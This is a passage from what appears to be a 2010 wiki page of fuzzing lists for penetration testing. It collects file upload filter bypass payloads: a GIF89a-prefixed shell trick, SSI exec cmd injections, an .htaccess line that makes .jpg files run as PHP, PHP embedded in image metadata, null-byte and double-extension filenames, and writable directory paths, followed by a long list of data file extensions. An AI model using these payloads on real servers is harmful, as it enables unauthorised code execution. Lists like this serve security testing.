&lt;br /&gt;
# For MIME filter bypass, your shellscript should look like&lt;br /&gt;
# -------&lt;br /&gt;
# GIF89aP;&lt;br /&gt;
# [shell]&lt;br /&gt;
# -------&lt;br /&gt;
#&lt;br /&gt;
# For mod_cgi Server Side Include upload attacks&lt;br /&gt;
#&lt;br /&gt;
#&amp;lt;!--#exec cmd=&amp;quot;ls&amp;quot; --&amp;gt;&lt;br /&gt;
#&lt;br /&gt;
#or, on Windows&lt;br /&gt;
#&lt;br /&gt;
#&amp;lt;!--#exec cmd=&amp;quot;dir&amp;quot; --&amp;gt;&lt;br /&gt;
#&lt;br /&gt;
# Sometimes you can overwrite .htaccess in an upload folder on Apache httpd, try setting .jpg to executable. If you can set the target directory, try fuzz the list of all dirs you've enumerated on the servers, and try the commonly writable directory fuzzfile.&lt;br /&gt;
#&lt;br /&gt;
# example .htaccess that sets mime type .jpg to be executable:&lt;br /&gt;
# -----&lt;br /&gt;
# AddType application/x-httpd-php .jpg&lt;br /&gt;
# -----&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== File Upload Filter Bypass - Generic (Update: 6 April 2010) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
# &lt;br /&gt;
%00index.html&lt;br /&gt;
;index.html&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== File Upload Filter Bypass - PHP Specific (Update: 6 April 2010) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
# &lt;br /&gt;
# Another test: use exiftool http://www.sno.phy.queensu.ca/~phil/exiftool/  to create a .jpg image with the meta comment field set to:&lt;br /&gt;
# -----&lt;br /&gt;
#&amp;lt;?php phpinfo(); ?&amp;gt; &lt;br /&gt;
#-----&lt;br /&gt;
{PHPSCRIPT}&lt;br /&gt;
{PHPSCRIPT}.phtml&lt;br /&gt;
{PHPSCRIPT}.php.html&lt;br /&gt;
{PHPSCRIPT}.php.php.rar &lt;br /&gt;
{PHPSCRIPT}.php.rar &lt;br /&gt;
# PHP on Windows&lt;br /&gt;
{PHPSCRIPT}.php::$DATA&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== File Upload Filter Bypass - Microsoft Specific (Update: 6 April 2010) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
# &lt;br /&gt;
# Another test: use exiftool http://www.sno.phy.queensu.ca/~phil/exiftool/  to create a .jpg image with the meta comment field set to:&lt;br /&gt;
# -----&lt;br /&gt;
#&amp;lt;?php phpinfo(); ?&amp;gt; &lt;br /&gt;
#-----&lt;br /&gt;
{PHPSCRIPT}&lt;br /&gt;
{PHPSCRIPT}.phtml&lt;br /&gt;
{PHPSCRIPT}.php.html&lt;br /&gt;
{PHPSCRIPT}.php::$DATA&lt;br /&gt;
{PHPSCRIPT}.php.php.rar &lt;br /&gt;
{PHPSCRIPT}.php.rar &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 2)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2010&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
%00index.html&lt;br /&gt;
;index.html&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== PHP-Specific Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 7)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# PHP-Specific File Upload Filter Bypass Appends  (Update: 17 March 2010 - notes&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
# also: use &amp;quot;gim&amp;quot; to create a .jpg image with the meta comment field set to:&lt;br /&gt;
# -----&lt;br /&gt;
#&amp;lt;?php phpinfo(); ?&amp;gt; &lt;br /&gt;
#-----&lt;br /&gt;
&lt;br /&gt;
{PHPSCRIPT}&lt;br /&gt;
{PHPSCRIPT}.phtml&lt;br /&gt;
{PHPSCRIPT}.php.html&lt;br /&gt;
{PHPSCRIPT}.php::$DATA&lt;br /&gt;
{PHPSCRIPT}.php.php.rar &lt;br /&gt;
{PHPSCRIPT}.php.rar&lt;br /&gt;
{PHPSCRIPT}.php.doc&lt;br /&gt;
{PHPSCRIPT}.php.xls&lt;br /&gt;
{PHPSCRIPT}.php.xlsx&lt;br /&gt;
{PHPSCRIPT}.php.pdf&lt;br /&gt;
{PHPSCRIPT}.php.jpeg&lt;br /&gt;
{PHPSCRIPT}.php.gif&lt;br /&gt;
{PHPSCRIPT}.php.zip&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Microsoft-Specific Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 14)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Microsoft-Specific Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2009&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
{ASPSCRIPT}&lt;br /&gt;
{ASPSCRIPT};&lt;br /&gt;
{ASPSCRIPT};.jpg&lt;br /&gt;
{ASPSCRIPT};.pdf&lt;br /&gt;
{ASPSCRIPT};.html&lt;br /&gt;
{ASPSCRIPT};.htm&lt;br /&gt;
{ASPSCRIPT};.txt&lt;br /&gt;
{ASPSCRIPT};.xyz&lt;br /&gt;
{ASPSCRIPT};.zip&lt;br /&gt;
{ASPSCRIPT};.tgz&lt;br /&gt;
{ASPSCRIPT};.doc&lt;br /&gt;
{ASPSCRIPT};.docx&lt;br /&gt;
{ASPSCRIPT};.xls&lt;br /&gt;
{ASPSCRIPT};.xlsx&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Commonly Writable Directories - For File Upload Filter Bypass - Filename Appends (Update: 10 April 2010 - Total Statements: 9)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;#Commonly Writable Directories - For File Upload Filter Bypass - Filename Appends  (Update: 17 March 2010) &lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
{PREFIX}/templates_compiled/&lt;br /&gt;
{PREFIX}/templates_c/&lt;br /&gt;
{PREFIX}/templates/&lt;br /&gt;
{PREFIX}/temporary/&lt;br /&gt;
{PREFIX}/images/&lt;br /&gt;
{PREFIX}/cache/&lt;br /&gt;
{PREFIX}/temp/&lt;br /&gt;
{PREFIX}/files/&lt;br /&gt;
{PREFIX}/tmp/&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Common Data File Extensions  (Update: 16 March 2010 - Total Statements: 863) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 #Common Data File Extensions  (Update: 16 March 2010 - Total Statements: 863&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
.$er&lt;br /&gt;
.123&lt;br /&gt;
.1pe&lt;br /&gt;
.1ph&lt;br /&gt;
.3dr&lt;br /&gt;
.3dt&lt;br /&gt;
.3me&lt;br /&gt;
.3pe&lt;br /&gt;
.4dl&lt;br /&gt;
.4dv&lt;br /&gt;
.8xk&lt;br /&gt;
.^^^&lt;br /&gt;
.a3l&lt;br /&gt;
.a3m&lt;br /&gt;
.a3w&lt;br /&gt;
.a4l&lt;br /&gt;
.a4m&lt;br /&gt;
.a4w&lt;br /&gt;
.a5l&lt;br /&gt;
.a5w&lt;br /&gt;
.a65&lt;br /&gt;
.aao&lt;br /&gt;
.ab&lt;br /&gt;
.ab1&lt;br /&gt;
.ab2&lt;br /&gt;
.ab3&lt;br /&gt;
.abcd&lt;br /&gt;
.abi&lt;br /&gt;
.abp&lt;br /&gt;
.aby&lt;br /&gt;
.aca&lt;br /&gt;
.acc&lt;br /&gt;
.accdb&lt;br /&gt;
.acf&lt;br /&gt;
.acg&lt;br /&gt;
.ade&lt;br /&gt;
.adp&lt;br /&gt;
.adt&lt;br /&gt;
.adx&lt;br /&gt;
.aft&lt;br /&gt;
.agd&lt;br /&gt;
.aifb&lt;br /&gt;
.alc&lt;br /&gt;
.ald&lt;br /&gt;
.ali&lt;br /&gt;
.amb&lt;br /&gt;
.amsorm&lt;br /&gt;
.an1&lt;br /&gt;
.anme&lt;br /&gt;
.apr&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ask&lt;br /&gt;
.asm&lt;br /&gt;
.ast&lt;br /&gt;
.at5&lt;br /&gt;
.att&lt;br /&gt;
.aw&lt;br /&gt;
.awg&lt;br /&gt;
.azw&lt;br /&gt;
.bafl&lt;br /&gt;
.bci&lt;br /&gt;
.bcm&lt;br /&gt;
.bdf&lt;br /&gt;
.bdic&lt;br /&gt;
.bfx&lt;br /&gt;
.bgl&lt;br /&gt;
.bgt&lt;br /&gt;
.bin&lt;br /&gt;
.bjo&lt;br /&gt;
.bk&lt;br /&gt;
.bkk&lt;br /&gt;
.blb&lt;br /&gt;
.bld&lt;br /&gt;
.blg&lt;br /&gt;
.bok&lt;br /&gt;
.box&lt;br /&gt;
.brd&lt;br /&gt;
.brw&lt;br /&gt;
.btf&lt;br /&gt;
.btif&lt;br /&gt;
.btm&lt;br /&gt;
.btr&lt;br /&gt;
.cap&lt;br /&gt;
.cat&lt;br /&gt;
.cbg&lt;br /&gt;
.cch&lt;br /&gt;
.ccr&lt;br /&gt;
.cct&lt;br /&gt;
.cdb&lt;br /&gt;
.cdd&lt;br /&gt;
.cdf&lt;br /&gt;
.cdp&lt;br /&gt;
.cdr&lt;br /&gt;
.cdx&lt;br /&gt;
.cel&lt;br /&gt;
.celtx&lt;br /&gt;
.chg&lt;br /&gt;
.chk&lt;br /&gt;
.chn&lt;br /&gt;
.ckd&lt;br /&gt;
.ckt&lt;br /&gt;
.cl2&lt;br /&gt;
.cl4&lt;br /&gt;
.clb&lt;br /&gt;
.clix&lt;br /&gt;
.clm&lt;br /&gt;
.clp&lt;br /&gt;
.cmbl&lt;br /&gt;
.cna&lt;br /&gt;
.contact&lt;br /&gt;
.cpi&lt;br /&gt;
.cpmz&lt;br /&gt;
.crd&lt;br /&gt;
.crtx&lt;br /&gt;
.csa&lt;br /&gt;
.csv&lt;br /&gt;
.ctf&lt;br /&gt;
.ctt&lt;br /&gt;
.cursorfx&lt;br /&gt;
.curxptheme&lt;br /&gt;
.cvd&lt;br /&gt;
.cvn&lt;br /&gt;
.cwk&lt;br /&gt;
.cws&lt;br /&gt;
.cwz&lt;br /&gt;
.cxt&lt;br /&gt;
.cyo&lt;br /&gt;
.cys&lt;br /&gt;
.daf&lt;br /&gt;
.dal&lt;br /&gt;
.dam&lt;br /&gt;
.das&lt;br /&gt;
.dat&lt;br /&gt;
.data&lt;br /&gt;
.db&lt;br /&gt;
.db2&lt;br /&gt;
.db3&lt;br /&gt;
.dbc&lt;br /&gt;
.dbd&lt;br /&gt;
.dbf&lt;br /&gt;
.dbx&lt;br /&gt;
.dcf&lt;br /&gt;
.dcl&lt;br /&gt;
.dcm&lt;br /&gt;
.dcmd&lt;br /&gt;
.ddc&lt;br /&gt;
.ddcx&lt;br /&gt;
.ddt&lt;br /&gt;
.dem&lt;br /&gt;
.des&lt;br /&gt;
.dex&lt;br /&gt;
.dfm&lt;br /&gt;
.dfproj&lt;br /&gt;
.dft&lt;br /&gt;
.dgb&lt;br /&gt;
.dif&lt;br /&gt;
.dii&lt;br /&gt;
.dlg&lt;br /&gt;
.dm2&lt;br /&gt;
.dmo&lt;br /&gt;
.dmsk&lt;br /&gt;
.dnc&lt;br /&gt;
.dockzip&lt;br /&gt;
.dp1&lt;br /&gt;
.dpn&lt;br /&gt;
.dpx&lt;br /&gt;
.drl&lt;br /&gt;
.dsb&lt;br /&gt;
.dsd&lt;br /&gt;
.dsk&lt;br /&gt;
.dsy&lt;br /&gt;
.dsz&lt;br /&gt;
.dt0&lt;br /&gt;
.dt1&lt;br /&gt;
.dt2&lt;br /&gt;
.dta&lt;br /&gt;
.dtr&lt;br /&gt;
.dvdproj&lt;br /&gt;
.dvo&lt;br /&gt;
.dwi&lt;br /&gt;
.e00&lt;br /&gt;
.eap&lt;br /&gt;
.ebuild&lt;br /&gt;
.ec0&lt;br /&gt;
.eco&lt;br /&gt;
.ecx&lt;br /&gt;
.edb&lt;br /&gt;
.edf&lt;br /&gt;
.eep&lt;br /&gt;
.efx&lt;br /&gt;
.egp&lt;br /&gt;
.emb&lt;br /&gt;
.emd&lt;br /&gt;
.emlxpart&lt;br /&gt;
.enc&lt;br /&gt;
.enw&lt;br /&gt;
.epp&lt;br /&gt;
.epub&lt;br /&gt;
.epw&lt;br /&gt;
.er1&lt;br /&gt;
.esp&lt;br /&gt;
.ess&lt;br /&gt;
.est&lt;br /&gt;
.esx&lt;br /&gt;
.et&lt;br /&gt;
.eta&lt;br /&gt;
.etd&lt;br /&gt;
.etl&lt;br /&gt;
.ev&lt;br /&gt;
.ev3&lt;br /&gt;
.evt&lt;br /&gt;
.evy&lt;br /&gt;
.exif&lt;br /&gt;
.exp&lt;br /&gt;
.exx&lt;br /&gt;
.fa&lt;br /&gt;
.fasta&lt;br /&gt;
.fbl&lt;br /&gt;
.fcd&lt;br /&gt;
.fcs&lt;br /&gt;
.fdb&lt;br /&gt;
.ffd&lt;br /&gt;
.ffwp&lt;br /&gt;
.fhc&lt;br /&gt;
.fid&lt;br /&gt;
.fil&lt;br /&gt;
.flame&lt;br /&gt;
.fll&lt;br /&gt;
.flo&lt;br /&gt;
.flp&lt;br /&gt;
.flt&lt;br /&gt;
.fm&lt;br /&gt;
.fm5&lt;br /&gt;
.fmp&lt;br /&gt;
.fo&lt;br /&gt;
.fob&lt;br /&gt;
.fol&lt;br /&gt;
.fop&lt;br /&gt;
.fox&lt;br /&gt;
.fp&lt;br /&gt;
.fp3&lt;br /&gt;
.fp4&lt;br /&gt;
.fp5&lt;br /&gt;
.fp7&lt;br /&gt;
.frl&lt;br /&gt;
.frm&lt;br /&gt;
.fro&lt;br /&gt;
.frx&lt;br /&gt;
.fsb&lt;br /&gt;
.fsc&lt;br /&gt;
.ftm&lt;br /&gt;
.ftw&lt;br /&gt;
.gan&lt;br /&gt;
.gbr&lt;br /&gt;
.gc&lt;br /&gt;
.gcx&lt;br /&gt;
.gdb&lt;br /&gt;
.ged&lt;br /&gt;
.gedcom&lt;br /&gt;
.gen&lt;br /&gt;
.ggb&lt;br /&gt;
.gml&lt;br /&gt;
.gms&lt;br /&gt;
.gno&lt;br /&gt;
.gnp&lt;br /&gt;
.gp3&lt;br /&gt;
.gpi&lt;br /&gt;
.gps&lt;br /&gt;
.gpx&lt;br /&gt;
.gra&lt;br /&gt;
.grade&lt;br /&gt;
.grf&lt;br /&gt;
.grib&lt;br /&gt;
.grk&lt;br /&gt;
.grr&lt;br /&gt;
.grv&lt;br /&gt;
.gs&lt;br /&gt;
.gst&lt;br /&gt;
.gtp&lt;br /&gt;
.gwk&lt;br /&gt;
.gxl&lt;br /&gt;
.hcc&lt;br /&gt;
.hce&lt;br /&gt;
.hci&lt;br /&gt;
.hcp&lt;br /&gt;
.hcr&lt;br /&gt;
.hcu&lt;br /&gt;
.hda&lt;br /&gt;
.hdb&lt;br /&gt;
.hdf&lt;br /&gt;
.hdi&lt;br /&gt;
.hdl&lt;br /&gt;
.hif&lt;br /&gt;
.hl&lt;br /&gt;
.hml&lt;br /&gt;
.hmt&lt;br /&gt;
.hs2&lt;br /&gt;
.hsk&lt;br /&gt;
.hst&lt;br /&gt;
.htg&lt;br /&gt;
.huh&lt;br /&gt;
.hyv&lt;br /&gt;
.i5z&lt;br /&gt;
.ib&lt;br /&gt;
.ics&lt;br /&gt;
.id2&lt;br /&gt;
.idx&lt;br /&gt;
.igc&lt;br /&gt;
.ihx&lt;br /&gt;
.ii&lt;br /&gt;
.iif&lt;br /&gt;
.img&lt;br /&gt;
.imt&lt;br /&gt;
.ink&lt;br /&gt;
.inp&lt;br /&gt;
.ins&lt;br /&gt;
.ip&lt;br /&gt;
.irock&lt;br /&gt;
.irr&lt;br /&gt;
.irx&lt;br /&gt;
.isf&lt;br /&gt;
.itdb&lt;br /&gt;
.itl&lt;br /&gt;
.itm&lt;br /&gt;
.itn&lt;br /&gt;
.itw&lt;br /&gt;
.itx&lt;br /&gt;
.ivt&lt;br /&gt;
.iw&lt;br /&gt;
.ixb&lt;br /&gt;
.jasper&lt;br /&gt;
.jdb&lt;br /&gt;
.jef&lt;br /&gt;
.jmp&lt;br /&gt;
.jnt&lt;br /&gt;
.job&lt;br /&gt;
.joboptions&lt;br /&gt;
.joined&lt;br /&gt;
.jph&lt;br /&gt;
.jrprint&lt;br /&gt;
.jrxml&lt;br /&gt;
.jude&lt;br /&gt;
.kap&lt;br /&gt;
.kdb&lt;br /&gt;
.kid&lt;br /&gt;
.kismac&lt;br /&gt;
.kmz&lt;br /&gt;
.kpf&lt;br /&gt;
.kpp&lt;br /&gt;
.kpr&lt;br /&gt;
.kpx&lt;br /&gt;
.kpz&lt;br /&gt;
.l&lt;br /&gt;
.l6t&lt;br /&gt;
.laccdb&lt;br /&gt;
.lbl&lt;br /&gt;
.lbx&lt;br /&gt;
.lcd&lt;br /&gt;
.lcf&lt;br /&gt;
.lcm&lt;br /&gt;
.ldif&lt;br /&gt;
.lex&lt;br /&gt;
.lgc&lt;br /&gt;
.lgf&lt;br /&gt;
.lgh&lt;br /&gt;
.lgi&lt;br /&gt;
.lgl&lt;br /&gt;
.lib&lt;br /&gt;
.lif&lt;br /&gt;
.livereg&lt;br /&gt;
.liveupdate&lt;br /&gt;
.lix&lt;br /&gt;
.llb&lt;br /&gt;
.lms&lt;br /&gt;
.lmx&lt;br /&gt;
.lnt&lt;br /&gt;
.loc&lt;br /&gt;
.lp7&lt;br /&gt;
.lrf&lt;br /&gt;
.lrs&lt;br /&gt;
.lrx&lt;br /&gt;
.lsf&lt;br /&gt;
.lsl&lt;br /&gt;
.lsp&lt;br /&gt;
.lsr&lt;br /&gt;
.lst&lt;br /&gt;
.lsu&lt;br /&gt;
.lvm&lt;br /&gt;
.lw4&lt;br /&gt;
.ly&lt;br /&gt;
.m&lt;br /&gt;
.mag&lt;br /&gt;
.mai&lt;br /&gt;
.map&lt;br /&gt;
.masseffectprofile&lt;br /&gt;
.mat&lt;br /&gt;
.mbb&lt;br /&gt;
.mbf&lt;br /&gt;
.mbg&lt;br /&gt;
.mbl&lt;br /&gt;
.mbp&lt;br /&gt;
.mbx&lt;br /&gt;
.mc1&lt;br /&gt;
.mc9&lt;br /&gt;
.mcd&lt;br /&gt;
.md&lt;br /&gt;
.mdb&lt;br /&gt;
.mdc&lt;br /&gt;
.mdf&lt;br /&gt;
.mdl&lt;br /&gt;
.mdm&lt;br /&gt;
.mdn&lt;br /&gt;
.mdt&lt;br /&gt;
.mdx&lt;br /&gt;
.mdz&lt;br /&gt;
.mem&lt;br /&gt;
.menc&lt;br /&gt;
.met&lt;br /&gt;
.mex&lt;br /&gt;
.mfo&lt;br /&gt;
.mfp&lt;br /&gt;
.mgc&lt;br /&gt;
.mls&lt;br /&gt;
.mm&lt;br /&gt;
.mmap&lt;br /&gt;
.mmc&lt;br /&gt;
.mmf&lt;br /&gt;
.mmp&lt;br /&gt;
.mnc&lt;br /&gt;
.mng&lt;br /&gt;
.mnk&lt;br /&gt;
.mno&lt;br /&gt;
.mny&lt;br /&gt;
.mobi&lt;br /&gt;
.moho&lt;br /&gt;
.mosaic&lt;br /&gt;
.mox&lt;br /&gt;
.mpd&lt;br /&gt;
.mpj&lt;br /&gt;
.mpp&lt;br /&gt;
.mpt&lt;br /&gt;
.mpx&lt;br /&gt;
.mpz&lt;br /&gt;
.mq4&lt;br /&gt;
.ms10&lt;br /&gt;
.mth&lt;br /&gt;
.mtw&lt;br /&gt;
.mud&lt;br /&gt;
.muf&lt;br /&gt;
.mw&lt;br /&gt;
.mwf&lt;br /&gt;
.mws&lt;br /&gt;
.mwx&lt;br /&gt;
.mxd&lt;br /&gt;
.myd&lt;br /&gt;
.myi&lt;br /&gt;
.nb&lt;br /&gt;
.nc&lt;br /&gt;
.ndf&lt;br /&gt;
.ndk&lt;br /&gt;
.ndx&lt;br /&gt;
.net&lt;br /&gt;
.neta&lt;br /&gt;
.nfo&lt;br /&gt;
.nitf&lt;br /&gt;
.nmind&lt;br /&gt;
.not&lt;br /&gt;
.notebook&lt;br /&gt;
.np&lt;br /&gt;
.npl&lt;br /&gt;
.npt&lt;br /&gt;
.nrl&lt;br /&gt;
.ns2&lt;br /&gt;
.ns3&lt;br /&gt;
.ns4&lt;br /&gt;
.nsf&lt;br /&gt;
.ntx&lt;br /&gt;
.numbers&lt;br /&gt;
.nvl&lt;br /&gt;
.nyf&lt;br /&gt;
.oab&lt;br /&gt;
.obj&lt;br /&gt;
.odb&lt;br /&gt;
.odf&lt;br /&gt;
.odp&lt;br /&gt;
.ods&lt;br /&gt;
.odx&lt;br /&gt;
.oeaccount&lt;br /&gt;
.ofc&lt;br /&gt;
.ofm&lt;br /&gt;
.oft&lt;br /&gt;
.ofx&lt;br /&gt;
.omcs&lt;br /&gt;
.omp&lt;br /&gt;
.ond&lt;br /&gt;
.one&lt;br /&gt;
.oo3&lt;br /&gt;
.opf&lt;br /&gt;
.opx&lt;br /&gt;
.or2&lt;br /&gt;
.or3&lt;br /&gt;
.or4&lt;br /&gt;
.or5&lt;br /&gt;
.or6&lt;br /&gt;
.org&lt;br /&gt;
.orx&lt;br /&gt;
.otf&lt;br /&gt;
.otl&lt;br /&gt;
.otln&lt;br /&gt;
.ots&lt;br /&gt;
.out&lt;br /&gt;
.ov2&lt;br /&gt;
.ova&lt;br /&gt;
.ovf&lt;br /&gt;
.p96&lt;br /&gt;
.p97&lt;br /&gt;
.pab&lt;br /&gt;
.paf&lt;br /&gt;
.pan&lt;br /&gt;
.pbd&lt;br /&gt;
.pc&lt;br /&gt;
.pcap&lt;br /&gt;
.pcb&lt;br /&gt;
.pcr&lt;br /&gt;
.pd4&lt;br /&gt;
.pd5&lt;br /&gt;
.pdas&lt;br /&gt;
.pdb&lt;br /&gt;
.pdd&lt;br /&gt;
.pdm&lt;br /&gt;
.pds&lt;br /&gt;
.pdx&lt;br /&gt;
.peb&lt;br /&gt;
.pec&lt;br /&gt;
.pep&lt;br /&gt;
.pex&lt;br /&gt;
.pfc&lt;br /&gt;
.pfl&lt;br /&gt;
.phb&lt;br /&gt;
.phm&lt;br /&gt;
.pi&lt;br /&gt;
.pis&lt;br /&gt;
.pjx&lt;br /&gt;
.pka&lt;br /&gt;
.pkb&lt;br /&gt;
.pkh&lt;br /&gt;
.pks&lt;br /&gt;
.pkt&lt;br /&gt;
.pln&lt;br /&gt;
.plw&lt;br /&gt;
.pmo&lt;br /&gt;
.pmr&lt;br /&gt;
.pnproj&lt;br /&gt;
.pnpt&lt;br /&gt;
.pns&lt;br /&gt;
.pnt&lt;br /&gt;
.pod&lt;br /&gt;
.poi&lt;br /&gt;
.pos&lt;br /&gt;
.postal&lt;br /&gt;
.pot&lt;br /&gt;
.potm&lt;br /&gt;
.potx&lt;br /&gt;
.pp2&lt;br /&gt;
.ppf&lt;br /&gt;
.pps&lt;br /&gt;
.ppsx&lt;br /&gt;
.ppt&lt;br /&gt;
.pptm&lt;br /&gt;
.pptx&lt;br /&gt;
.prc&lt;br /&gt;
.pre&lt;br /&gt;
.prf&lt;br /&gt;
.prj&lt;br /&gt;
.prm&lt;br /&gt;
.prs&lt;br /&gt;
.psa&lt;br /&gt;
.psf&lt;br /&gt;
.psm&lt;br /&gt;
.pst&lt;br /&gt;
.ptb&lt;br /&gt;
.ptf&lt;br /&gt;
.ptk&lt;br /&gt;
.ptm&lt;br /&gt;
.ptn&lt;br /&gt;
.ptt&lt;br /&gt;
.ptz&lt;br /&gt;
.pvl&lt;br /&gt;
.pwd&lt;br /&gt;
.pxj&lt;br /&gt;
.pxl&lt;br /&gt;
.q07&lt;br /&gt;
.q08&lt;br /&gt;
.q09&lt;br /&gt;
.q3d&lt;br /&gt;
.qbw&lt;br /&gt;
.qdat&lt;br /&gt;
.qdf&lt;br /&gt;
.qdfm&lt;br /&gt;
.qel&lt;br /&gt;
.qfx&lt;br /&gt;
.qif&lt;br /&gt;
.qpb&lt;br /&gt;
.qpf&lt;br /&gt;
.qph&lt;br /&gt;
.qpm&lt;br /&gt;
.qpw&lt;br /&gt;
.qrp&lt;br /&gt;
.qsd&lt;br /&gt;
.ral&lt;br /&gt;
.rbt&lt;br /&gt;
.rcd&lt;br /&gt;
.rcg&lt;br /&gt;
.rdb&lt;br /&gt;
.rdf&lt;br /&gt;
.rdx&lt;br /&gt;
.ref&lt;br /&gt;
.ret&lt;br /&gt;
.rf1&lt;br /&gt;
.rfa&lt;br /&gt;
.rfo&lt;br /&gt;
.rge&lt;br /&gt;
.rgn&lt;br /&gt;
.rgo&lt;br /&gt;
.rmuf&lt;br /&gt;
.rnq&lt;br /&gt;
.rod&lt;br /&gt;
.rog&lt;br /&gt;
.roi&lt;br /&gt;
.rou&lt;br /&gt;
.rpp&lt;br /&gt;
.rpt&lt;br /&gt;
.rrt&lt;br /&gt;
.rsc&lt;br /&gt;
.rsd&lt;br /&gt;
.rsw&lt;br /&gt;
.rte&lt;br /&gt;
.rvt&lt;br /&gt;
.rwg&lt;br /&gt;
.rzb&lt;br /&gt;
.s85&lt;br /&gt;
.saf&lt;br /&gt;
.sam07&lt;br /&gt;
.sar&lt;br /&gt;
.sav&lt;br /&gt;
.sbd&lt;br /&gt;
.sbf&lt;br /&gt;
.sbq&lt;br /&gt;
.sbt&lt;br /&gt;
.sca&lt;br /&gt;
.scf&lt;br /&gt;
.sch&lt;br /&gt;
.sdb&lt;br /&gt;
.sdc&lt;br /&gt;
.sdf&lt;br /&gt;
.sdp&lt;br /&gt;
.sdq&lt;br /&gt;
.sds&lt;br /&gt;
.sen&lt;br /&gt;
.seo&lt;br /&gt;
.seq&lt;br /&gt;
.ser&lt;br /&gt;
.sgml&lt;br /&gt;
.sgn&lt;br /&gt;
.shp&lt;br /&gt;
.shs&lt;br /&gt;
.shx&lt;br /&gt;
.skc&lt;br /&gt;
.skv&lt;br /&gt;
.skx&lt;br /&gt;
.sle&lt;br /&gt;
.slk&lt;br /&gt;
.slp&lt;br /&gt;
.snapfireshow&lt;br /&gt;
.sonic&lt;br /&gt;
.soundpack&lt;br /&gt;
.spo&lt;br /&gt;
.sps&lt;br /&gt;
.spub&lt;br /&gt;
.spv&lt;br /&gt;
.sq&lt;br /&gt;
.sqd&lt;br /&gt;
.sql&lt;br /&gt;
.sqlite&lt;br /&gt;
.sqr&lt;br /&gt;
.sta&lt;br /&gt;
.stc&lt;br /&gt;
.stf&lt;br /&gt;
.stk&lt;br /&gt;
.stl&lt;br /&gt;
.stm&lt;br /&gt;
.stp&lt;br /&gt;
.str&lt;br /&gt;
.stt&lt;br /&gt;
.stw&lt;br /&gt;
.styk&lt;br /&gt;
.stykz&lt;br /&gt;
.swk&lt;br /&gt;
.sxc&lt;br /&gt;
.sxi&lt;br /&gt;
.sy3&lt;br /&gt;
.t01&lt;br /&gt;
.t02&lt;br /&gt;
.t03&lt;br /&gt;
.t04&lt;br /&gt;
.t05&lt;br /&gt;
.t06&lt;br /&gt;
.t07&lt;br /&gt;
.t08&lt;br /&gt;
.t09&lt;br /&gt;
.t2&lt;br /&gt;
.t3001&lt;br /&gt;
.tax2008&lt;br /&gt;
.tax2009&lt;br /&gt;
.tb&lt;br /&gt;
.tbk&lt;br /&gt;
.tbl&lt;br /&gt;
.tcc&lt;br /&gt;
.tcx&lt;br /&gt;
.tda&lt;br /&gt;
.tdl&lt;br /&gt;
.tdm&lt;br /&gt;
.tdt&lt;br /&gt;
.te&lt;br /&gt;
.te3&lt;br /&gt;
.teacher&lt;br /&gt;
.tef&lt;br /&gt;
.tet&lt;br /&gt;
.tfa&lt;br /&gt;
.tfd&lt;br /&gt;
.tfrd&lt;br /&gt;
.tjp&lt;br /&gt;
.tk3&lt;br /&gt;
.tkfl&lt;br /&gt;
.tmw&lt;br /&gt;
.tol&lt;br /&gt;
.topc&lt;br /&gt;
.tpb&lt;br /&gt;
.tps&lt;br /&gt;
.tr3&lt;br /&gt;
.tra&lt;br /&gt;
.trd&lt;br /&gt;
.trk&lt;br /&gt;
.trs&lt;br /&gt;
.trx&lt;br /&gt;
.tst&lt;br /&gt;
.tsv&lt;br /&gt;
.ttk&lt;br /&gt;
.txa&lt;br /&gt;
.txd&lt;br /&gt;
.txf&lt;br /&gt;
.uccapilog&lt;br /&gt;
.ud&lt;br /&gt;
.udb&lt;br /&gt;
.udeb&lt;br /&gt;
.uds&lt;br /&gt;
.ulf&lt;br /&gt;
.ulz&lt;br /&gt;
.update&lt;br /&gt;
.upoi&lt;br /&gt;
.usr&lt;br /&gt;
.uvf&lt;br /&gt;
.uwl&lt;br /&gt;
.val&lt;br /&gt;
.vbpf1&lt;br /&gt;
.vcd&lt;br /&gt;
.vce&lt;br /&gt;
.vcf&lt;br /&gt;
